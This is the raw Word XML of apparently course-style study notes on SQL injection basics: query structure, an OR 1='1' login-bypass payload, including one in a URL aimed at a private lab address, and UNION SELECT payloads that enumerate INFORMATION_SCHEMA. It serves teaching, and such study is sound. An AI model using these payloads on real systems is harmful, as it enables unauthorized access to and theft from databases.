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spacing w:lineRule="auto" w:line="240" w:before="240" w:after="120"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>SQL Injection Basics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hyperlink r:id="rId2">
        <w:r>
          <w:rPr>
            <w:color w:val="1155CC"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://dev.mysql.com/doc/refman/8.0/en/information-schema.html</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>https://dev.mysql.com/doc/refman/8.0/en/information-functions.html#function_database</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:spacing w:lineRule="auto" w:line="276"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:hyperlink r:id="rId3">
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
            <w:b/>
            <w:color w:val="1155CC"/>
            <w:sz w:val="22"/>
            <w:szCs w:val="22"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:spacing w:lineRule="auto" w:line="276"/>
        <w:rPr>
          <w:rFonts w:ascii="Arial" w:hAnsi="Arial" w:eastAsia="Arial" w:cs="Arial"/>
          <w:b/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="000000"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>https://sqlwiki.netspi.com/attackQueries/informationGathering/#mysql</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="false"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>SQL Layout</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>-&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>Database</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>--&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Table</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>---&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>Columns</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>----&gt;</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FF0000"/>
        </w:rPr>
        <w:t>Rows</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="false"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Basic SQL Queries</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">1. SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>*</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> From </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Customers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">2. SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>CustomerID, ContactName, City, PostalCode</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> From </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>Customers</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">3. SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>CustomerID, ContactName, City, PostalCode</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> From</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t xml:space="preserve"> Customers</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>WHERE City =</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="white"/>
        </w:rPr>
        <w:t>'Berlin'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="lightGray"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">4. SELECT </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="green"/>
        </w:rPr>
        <w:t>username, password</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> FROM </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="yellow"/>
        </w:rPr>
        <w:t>users</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">WHERE </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>username</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user' OR 1='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">AND </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
          <w:highlight w:val="blue"/>
        </w:rPr>
        <w:t>password</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:color w:val="FFFFFF"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve">= </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>user' OR 1='1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
        </w:rPr>
        <w:t>'</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t>;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5. GOLDEN STATEMENT</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:eastAsia="Arial" w:cs="Arial" w:ascii="Arial" w:hAnsi="Arial"/>
          <w:b/>
          <w:color w:val="333333"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SELECT table_schema,table_name,column_name from information_schema.columns;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>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Resource:</w:t>
      </w:r>
      <w:r>
        <w:rPr/>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId4">
        <w:r>
          <w:rPr>
            <w:color w:val="000080"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>https://www.w3schools.com/sql/trysql.asp?filename=trysql_select_all</w:t>
        </w:r>
      </w:hyperlink>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="false"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Determining how to submit information to the web server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POST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rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
        <w:t>Submit through the text boxes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr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GET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rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
        <w:t>Modify the URL params</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
        <w:t>http://10.50.24.218/login.php?username=user’ OR 1=’1&amp;passwd=user OR 1=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="false"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Injections</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t xml:space="preserve">' (single quotes) </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>to close off quotations added in the back end query</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Modify the logic of the query to make something else true.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>1=1, 2=2, etc</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:ind w:left="720" w:hanging="360"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>The value tested to be true by the OR statement</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false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rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Example:</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false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rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>Underlying Query (Cannot be changed) User inputted Query</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false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rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>SELECT name, user, pass, token FROM authentication WHERE user = '$user'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false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rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>SELECT name, user, pass, token FROM authentication WHERE user = 'bacon'OR 1='1'</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false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rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:highlight w:val="red"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">bacon </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve">is false because that value does not exist in the table, but </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="cyan"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>1=1</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> is true because it is mathematically correct. The </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:highlight w:val="blue"/>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t>OR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> statement requires </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>only one side of the comparison to be true</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:u w:val="none"/>
        </w:rPr>
        <w:t xml:space="preserve"> in order evaluate the query has True!</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="false"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Determining how to submit information to the web server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POST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rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
        <w:t>Submit through the text boxes</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>GET</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
        <w:t>Modify the URL params</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:bookmarkStart w:id="0" w:name="_heading=h.gjdgxs"/>
      <w:bookmarkEnd w:id="0"/>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
        <w:t>http://10.50.24.218/login.php?username=user’ OR 1=’1&amp;passwd=user OR 1=’1</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr>
          <w:b w:val="false"/>
          <w:b w:val="false"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b w:val="false"/>
        </w:rPr>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Normal1"/>
        <w:pageBreakBefore w:val="false"/>
        <w:rPr/>
      </w:pPr>
      <w:r>
        <w:rPr/>
        <w:t>Enumerating SQL via Information Schema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hyperlink r:id="rId5">
        <w:r>
          <w:rPr>
            <w:rFonts w:eastAsia="Liberation Serif" w:cs="Liberation Serif"/>
            <w:b w:val="false"/>
            <w:i w:val="false"/>
            <w:caps w:val="false"/>
            <w:smallCaps w:val="false"/>
            <w:strike w:val="false"/>
            <w:dstrike w:val="false"/>
            <w:color w:val="000080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https://dev.mysql.com/doc/refman/5.7/en/information-schema.html</w:t>
        </w:r>
      </w:hyperlink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bacon' UNION SELECT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yellow"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>TABLE_NAME,2,3,4,5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FROM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cyan"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>INFORMATION_SCHEMA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green"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>TABLES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;#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bacon' UNION SELECT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yellow"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>COLUMN_NAME,2,3,4,5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FROM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cyan"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>INFORMATION_SCHEMA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green"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>COLUMNS;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#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0"/>
          <w:szCs w:val="20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bacon' UNION SELECT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yellow"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>SCHEMA_NAME,2,3,4,5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FROM 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cyan"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>INFORMATION_SCHEMA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>.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green"/>
          <w:u w:val="none"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>SCHEMATA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>;#</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading2"/>
        <w:pageBreakBefore w:val="false"/>
        <w:numPr>
          <w:ilvl w:val="1"/>
          <w:numId w:val="4"/>
        </w:numPr>
        <w:ind w:left="0" w:hanging="0"/>
        <w:rPr>
          <w:b/>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:u w:val="single"/>
        </w:rPr>
        <w:t>Process for testing for vulnerabilities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auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Locate a place were data can be sent to the server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auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Attempt to modify the logic of the underlying query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auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Enumerate the database with a UNION attack!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5"/>
        </w:numPr>
        <w:pBdr/>
        <w:shd w:val="clear" w:fill="auto"/>
        <w:spacing w:lineRule="auto" w:line="288" w:before="0" w:after="140"/>
        <w:ind w:left="720" w:right="0" w:hanging="36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shd w:fill="auto" w:val="clear"/>
          <w:vertAlign w:val="baseline"/>
        </w:rPr>
        <w:t>Use data from union attacks, union select the needed information from the server.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88" w:before="0" w:after="140"/>
        <w:ind w:left="720" w:right="0" w:hanging="0"/>
        <w:jc w:val="left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A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Normal1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Normal1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1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en-US" w:eastAsia="zh-CN" w:bidi="hi-IN"/>
    </w:rPr>
  </w:style>
  <w:style w:type="paragraph" w:styleId="Title">
    <w:name w:val="Title"/>
    <w:basedOn w:val="Heading"/>
    <w:next w:val="Normal1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mysql.com/doc/refman/8.0/en/information-schema.html" TargetMode="External"/><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="http://pentestmonkey.net/cheat-sheet/sql-injection/mysql-sql-injection-cheat-sheet" TargetMode="External"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.w3schools.com/sql/trysql.asp?filename=trysql_select_all" TargetMode="External"/><Relationship Id="rId5" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://dev.mysql.com/doc/refman/5.7/en/information-schema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dcO8nb9pKGB++zP1TBKwdF27t/Q==">AMUW2mV5vNrpoUQe2Po56J++CTWQXu+bs3PkPoFD13qISFVJuJt5JhrQy4nLB0efR7zVZX67ymo4ZdTFJcXh3B+dExrJwhL3ziRyByZLSzZABb8gZikPD4Hm9+pV4gxbNhNu5X/j33TP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309</Words>
  <Characters>2187</Characters>
  <CharactersWithSpaces>2443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2020-05-14T08:53:25Z</dcterms:created>
  <dc:creator/>
  <dc:description/>
  <dc:language>en-US</dc:language>
  <cp:lastModifiedBy/>
  <cp:revision>0</cp:revision>
  <dc:subject/>
  <dc:title/>
</cp:coreProperties>
</file>